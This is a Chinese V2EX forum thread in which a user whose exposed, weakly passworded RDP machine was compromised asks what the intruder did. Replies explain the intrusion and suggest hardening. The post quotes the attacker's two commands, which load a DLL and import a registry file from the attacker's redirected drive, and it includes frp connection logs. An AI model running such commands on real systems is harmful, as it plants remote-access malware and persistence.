3389 端口开了两天,就被人搞了...

2022-10-27 12:48:38 +08:00
 Droog

办公室有台没用的电脑,拿来刷网课。用 frp 打洞,直接开的 3389 端口,用 mstsc 远程控制。 才开了 2 天,就被人搞进来了,应该是弱口令的问题。

看到别人的操作记录

请问有人知道这是操作了什么不?

rundll32 \\tsclient\a\a.dll a
regedit /s \\tsclient\a\r.reg

frp 服务端日志

2022/10/27 06:17:01 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [154.89.5.220:38210]
2022/10/27 06:17:01 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [154.89.5.220:39680]
2022/10/27 06:17:02 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [154.89.5.220:40964]
2022/10/27 06:17:03 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [154.89.5.220:42406]
2022/10/27 06:17:03 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [154.89.5.220:43746]
2022/10/27 06:17:04 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [154.89.5.220:44924]
2022/10/27 06:17:05 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [154.89.5.220:46104]
2022/10/27 06:17:05 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [154.89.5.220:47126]
2022/10/27 06:17:06 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [154.89.5.220:48130]
2022/10/27 06:17:07 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [154.89.5.220:49162]
2022/10/27 06:38:56 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [218.15.254.218:49298]
2022/10/27 06:48:35 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [218.26.179.7:55213]
2022/10/27 06:55:41 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [77.83.36.44:37643]
2022/10/27 06:55:41 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [77.83.36.44:38109]
2022/10/27 07:04:11 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [218.15.254.218:62334]
2022/10/27 07:12:42 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [185.170.144.46:3172]
2022/10/27 07:13:48 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [218.15.254.218:56728]
2022/10/27 07:16:39 [I] [control.go:309] [fcd53d7a449ce30e] control writer is closing
3483 次点击
所在节点    问与答
20 条回复
7zlid
2022-10-27 12:49:41 +08:00
重装系统吧
cndns
2022-10-27 13:02:35 +08:00
RDP 使用 3389 和 SSH 使用 22 的都是勇士
Droog
2022-10-27 13:06:42 +08:00
@cndns 收到教训了...
@7zlid 估计只有这样了!
kingpo
2022-10-27 13:07:02 +08:00
改下 3389 端口
maskerTUI
2022-10-27 13:09:26 +08:00
弱口令才是真正的问题
villivateur
2022-10-27 13:09:38 +08:00
@cndns 用标准端口没有任何问题,比如 SSH ,如果关闭密码登录,只允许 RSA 密钥登录,随便黑客怎样都不可能攻破
flexbug
2022-10-27 13:09:55 +08:00
建议使用向日葵或者 todesk 不要自己创造风险
mcluyu
2022-10-27 13:38:50 +08:00
默认用户名(或者容易猜到的常见用户名)+ 弱口令, 至于使用什么端口根本无所谓。
vmebeh
2022-10-27 13:40:57 +08:00
套个 wireguard 回来随便用
Ufo666
2022-10-27 15:15:29 +08:00
@cndns 别吓我,我们公司就是 22
Droog
2022-10-27 16:06:28 +08:00
@vmebeh 我试试看。
0x73346b757234
2022-10-27 17:58:31 +08:00
黑阔用 rundll32 白加黑的方式执行了一个恶意 dll 文件,猜测是远控木马。注册表加了个一个记录也许是做了持久化。
kongkongye
2022-10-27 18:03:19 +08:00
我上次也是,用 frp 无密码暴露了 docker😂
ungrown
2022-10-27 18:32:37 +08:00
@villivateur #6 rdp 也可以这样吗只允许密钥登录?
zero47
2022-10-27 19:26:12 +08:00
之前用凉心云搭 transmission 远程下载,每次登上去都提示密码错误次数过多,要求重启。什么端口都没用,专门有人恶意扫端口的,还是好好加密比较重要。ssh 用 22 我觉得没问题,用证书加密就好。
mmm159357456
2022-10-27 20:11:47 +08:00
rdp 可以上证书验证吗?
swulling
2022-10-27 20:13:33 +08:00
不要暴露任何控制端口到公网
aver4vex
2022-10-27 20:28:04 +08:00
我现在就是软路由开 wireguard 服务。随便折腾。
PerFectTime
2022-10-28 10:33:52 +08:00
VPN 连回家最安全,商业公司的软件你也不知道里面有没有 0day
HFX3389
2022-10-28 18:27:54 +08:00
frp 开 stcp 呗,不用普通的 tcp

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/890337

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX